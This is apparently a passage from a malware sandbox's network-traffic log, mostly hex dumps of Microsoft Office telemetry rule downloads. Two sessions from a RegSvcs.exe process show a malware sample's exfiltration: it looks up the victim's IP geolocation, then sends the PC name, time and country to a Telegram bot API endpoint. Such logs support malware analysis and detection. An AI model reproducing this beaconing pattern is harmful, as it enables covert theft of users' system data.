                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                                                                    Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    12192.168.2.549732188.114.97.34435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC888INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:17 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 11207
                                                                                                                                                                                                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nut2J0jY3vP13FG7zYF96s2r9juM92IxpUdvVC7k698gi2tTOXIqBZ1ZNusDtlP2tiNUx6vy%2FImieMPXsAu2SDZJSNJZF55EciSIMr8z2UTDnrYn%2F%2F37hb%2BHT7wa4awhQvvm1%2F9S"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8da30cd47be64677-DFW
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=977&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2870168&cwnd=247&unsent_bytes=0&cid=d1888034f92b4386&ts=746&x=0"
                                                                                                                                                                                                                                                    2024-10-29 12:08:17 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    13192.168.2.549733149.154.167.2204435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:18 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2029/10/2024%20/%2023:58:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    2024-10-29 12:08:19 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:19 GMT
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                    2024-10-29 12:08:19 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    14192.168.2.54973913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:20 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 408
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                    x-ms-request-id: c3a6d21e-601e-00ab-1dc6-2766f4000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120820Z-17c5cb586f6b6kj91vqtm6kxaw0000000540000000008u8t
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    15192.168.2.54973513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:20 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 3788
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                    x-ms-request-id: 5d69bbb7-d01e-008e-6d6a-27387a000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120820Z-17c5cb586f6z6tw6g7cmdv30m800000007ug000000005md3
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    16192.168.2.54973813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:20 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 2160
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                    x-ms-request-id: fc6998d3-101e-008d-52ad-2692e5000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120820Z-16849878b786lft2mu9uftf3y400000007t0000000007h15
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    17192.168.2.54973613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:20 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 450
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                    x-ms-request-id: 9a0790d9-e01e-0052-7cad-26d9df000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120820Z-16849878b78z2wx67pvzz63kdg0000000530000000009wef
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    18192.168.2.54973713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:20 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 2980
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                    x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120820Z-15b8d89586fqj7k5h9gbd8vs9800000007p00000000075zx
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:20 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    19192.168.2.54974413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 467
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                    x-ms-request-id: e84b733d-701e-005c-1bb8-26bb94000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120821Z-16849878b78fssff8btnns3b1400000006q000000000dmqq
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    20192.168.2.54974213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
